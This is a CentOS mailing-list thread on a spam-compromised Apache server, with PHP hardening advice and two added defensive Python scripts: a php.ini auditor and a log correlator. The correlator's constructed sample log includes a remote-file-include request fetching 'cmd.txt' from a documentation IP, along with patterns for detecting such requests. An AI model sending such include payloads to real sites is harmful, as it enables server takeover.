Just as an fyi on a good checklist for linux (not comprehensive but a good start) http://www.cisecurity.org/bench_linux.html
And some good areas via google on secure centos installations.
If they do it again then it won't be your perl script, obviously, as you mentioned disabling the script; but if not, is your script configured with use strict and taint? Is every var in the script checked to ensure the data is within an allowed range? Does the perl script rely on third-party modules? If so you might check there as well.
The rest is an assumption that you may have php installed on the system and someone may have used a php script as a gateway into your system.
Even though the box has been compromised you may get lucky, if this is related to apache, by looking at the timestamps on the files in /tmp and correlating those with your apache logs.
If so, check your php logs as well (if you enabled it in /etc/php.ini). Are you running in safe mode? There are some things you can do to help reduce the amount of damage a vulnerable php script can do:
safe_mode = On
safe_mode_gid = On
safe_mode_include_dir = /path where any include files you trust reside (read only by the apache process)
safe_mode_exec_dir = /path to area where you allow any executables to be called from php scripts
Also (not restricted to safe mode) is if this is a home server you can also restrict where php scripts can 'roam': open_basedir = /var/www/html (for example) will prevent php scripts from going outside the /var/www/html area.
If you're done debugging any web code, set this: display_errors = off
And turn on php file logging: log_errors = On and error_log = /var/log/phplogfilename.log
Unless you need to allow file uploads, turn that off too: file_uploads = Off
The same goes for treating URLs as files: allow_url_fopen = Off
Also make sure all the files in /var/www/html or whatever are not owned by the apache process so they cannot be over-written if at all possible.
-Greg
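As an added example (not code from the thread, from CentOS or from the PHP project), here is a small audit script that checks a php.ini against the settings recommended above: it parses the active directives, treats anything unset as a finding rather than assuming a default, and reports each directive that is missing or weaker than recommended. The two php.ini samples are constructed for the example. The directive names are real php.ini directives; note that safe_mode and its companions were removed in PHP 5.4, so on a modern PHP those three checks simply report the directive as absent and open_basedir carries the load.

```python
"""Audit a php.ini for the hardening settings discussed in the reply above.

Added example, not from the thread or the PHP project. Assumes the php.ini
is available as text; the sample INI strings below are constructed.
"""
import re
import sys

# Recommended values taken from the reply above. open_basedir and error_log
# are paths, so the audit only requires that they are explicitly set.
EXPECTED = {
    "safe_mode": "On",
    "safe_mode_gid": "On",
    "open_basedir": "<any path>",
    "display_errors": "Off",
    "log_errors": "On",
    "error_log": "<any path>",
    "file_uploads": "Off",
    "allow_url_fopen": "Off",
}

_DIRECTIVE = re.compile(r"^([A-Za-z_.]+)\s*=\s*(.*)$")


def parse_php_ini(text):
    """Return {directive: value} for the active (uncommented) lines.

    Later occurrences win, as in PHP itself. Section headers such as [PHP]
    and ';' comments are ignored; surrounding quotes on values are stripped.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop trailing/inline comments
        if not line or line.startswith("["):
            continue
        m = _DIRECTIVE.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip().strip('"')
    return settings


def _is_on(value):
    """php.ini boolean semantics: 1/On/True/Yes mean on, anything else off."""
    return value.strip().lower() in ("1", "on", "true", "yes")


def audit_php_ini(text):
    """Return (directive, actual, expected) for every directive that is unset
    or weaker than the recommendation; an empty list means all checks pass."""
    settings = parse_php_ini(text)
    findings = []
    for key, expected in EXPECTED.items():
        if key not in settings:
            findings.append((key, "(unset)", expected))
            continue
        actual = settings[key]
        if expected == "<any path>":
            ok = actual != ""
        else:
            ok = _is_on(actual) == (expected == "On")
        if not ok:
            findings.append((key, actual, expected))
    return findings


# Constructed sample: a stock-looking php.ini with the weak settings.
WEAK_INI = """\
[PHP]
; constructed sample
safe_mode = Off
display_errors = On
log_errors = Off
file_uploads = On
allow_url_fopen = On
"""

# Constructed sample: the same file with the settings recommended above.
HARDENED_INI = """\
[PHP]
; constructed sample
safe_mode = On
safe_mode_gid = On
open_basedir = /var/www/html
display_errors = Off ; production box, no error text to the browser
log_errors = On
error_log = /var/log/phplogfilename.log
file_uploads = Off
allow_url_fopen = Off
"""

if __name__ == "__main__":
    # With a path argument audit that file; otherwise audit the weak sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_INI
    for key, actual, expected in audit_php_ini(text):
        print(f"{key:22} is {actual:12} recommended: {expected}")
```

Run it as `python audit_php_ini.py /etc/php.ini` (hypothetical file name) to get one line per directive that needs attention; a silent run means every recommended directive is explicitly set to the recommended value.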
-----Original Message-----
From: centos-bounces@centos.org [mailto:centos-bounces@centos.org] On Behalf Of Matthew T. O'Connor
Sent: Thursday, June 22, 2006 11:53 AM
To: CentOS mailing list
Subject: [CentOS] Apache Security
Hello, I have a server running CentOS 4.3 with all the latest updates. The server in question has been hacked by spammers a few times. The details of the hack have been basically the same every time. I find some directory created by the apache user account in /tmp. The new directory contains an html file, and a list of email addresses to spam and a perl script that spams all those email addresses with the html file.
My question is why is this happening? Obviously it's some apache exploit. I have removed mod_perl, that didn't help. I have now changed the permissions on the perl executable, that might help, we will see, but that doesn't address the core problem. How is it that someone can upload arbitrary files to my server and then execute an arbitrary command via apache?
Is this a known problem? Have others seen it? What can I do to help prevent this?
Thanks,
Matt
_______________________________________________
CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
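The suggestion in the reply above, correlating the timestamps of the spammer's directory in /tmp with the apache logs, is easy to do by hand once but tedious on every incident. As an added example (not code from the thread, from CentOS or from Apache), the script below takes the modification time of the suspicious /tmp entry, parses Apache's default combined log format, and lists every request that arrived within a few minutes of it, nearest first, flagging the ones most worth a second look: a POST (a form or upload abused to drop the files), a query string that passes a URL (the allow_url_fopen include-from-remote pattern the reply warns about), or a path that mentions /tmp. The log lines and the timestamp are constructed for the example; with a path argument it stats the real entry and reads the log from stdin.

```python
"""Correlate a suspicious /tmp entry's mtime with Apache access-log requests.

Added example, not code from the thread or from Apache. Assumes the Apache
combined log format (the stock httpd.conf default); the sample log lines and
the sample mtime below are constructed and use documentation IP ranges.
"""
import os
import re
import sys
from datetime import datetime, timedelta, timezone

# combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)


def parse_log_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Apache writes e.g. 22/Jun/2006:11:40:07 -0400
    entry["when"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    parts = entry["request"].split()
    entry["method"] = parts[0] if parts else ""
    entry["path"] = parts[1] if len(parts) > 1 else ""
    return entry


def requests_near(lines, when, window=timedelta(minutes=5)):
    """Requests within +/- window of `when`, nearest first.

    Each hit gets a 'flags' list: 'POST' for a write/upload request,
    'url-in-query' when a parameter value is itself a URL, and 'tmp-path'
    when the request path names /tmp (plain or percent-encoded).
    """
    hits = []
    for line in lines:
        e = parse_log_line(line)
        if e is None:
            continue
        delta = abs(e["when"] - when)
        if delta > window:
            continue
        flags = []
        if e["method"] == "POST":
            flags.append("POST")
        if re.search(r"[?&][^=&]+=(?:https?|ftp)://", e["path"], re.I):
            flags.append("url-in-query")
        if "/tmp/" in e["path"] or "%2Ftmp%2F" in e["path"]:
            flags.append("tmp-path")
        e["flags"] = flags
        e["delta"] = delta
        hits.append(e)
    hits.sort(key=lambda e: e["delta"])
    return hits


def mtime_of(path):
    """Modification time of a file or directory as a timezone-aware datetime."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, timezone.utc)


# Constructed sample log: a normal visit, then a remote-URL include attempt
# and a POST from the same client, then an unrelated later visit.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jun/2006:11:38:02 -0400] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [22/Jun/2006:11:40:07 -0400] "GET /gallery/view.php?page=http://198.51.100.9/cmd.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [22/Jun/2006:11:40:09 -0400] "POST /gallery/upload.php HTTP/1.1" 200 128 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [22/Jun/2006:13:02:55 -0400] "GET /about.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# Constructed mtime of the spammer's directory in /tmp (server runs at -0400).
SUSPECT_MTIME = datetime(2006, 6, 22, 11, 40, 10, tzinfo=timezone(timedelta(hours=-4)))

if __name__ == "__main__":
    # With a path argument, use that entry's real mtime and read the access
    # log from stdin; without one, run on the constructed sample.
    if len(sys.argv) > 1:
        when, lines = mtime_of(sys.argv[1]), sys.stdin
    else:
        when, lines = SUSPECT_MTIME, SAMPLE_LOG
    for e in requests_near(lines, when):
        print(f'{e["when"]:%H:%M:%S} {e["host"]:15} {e["method"]:4} {e["path"]} {e["flags"]}')
```

Typical use on the box in question would be `python tmp_correlate.py /tmp/suspicious.dir < /var/log/httpd/access_log` (file names hypothetical). Note that mtime on a directory changes when entries are added or removed, so the directory's mtime marks the last write, not necessarily the first; if the entries inside have earlier mtimes, run the script against the earliest one too.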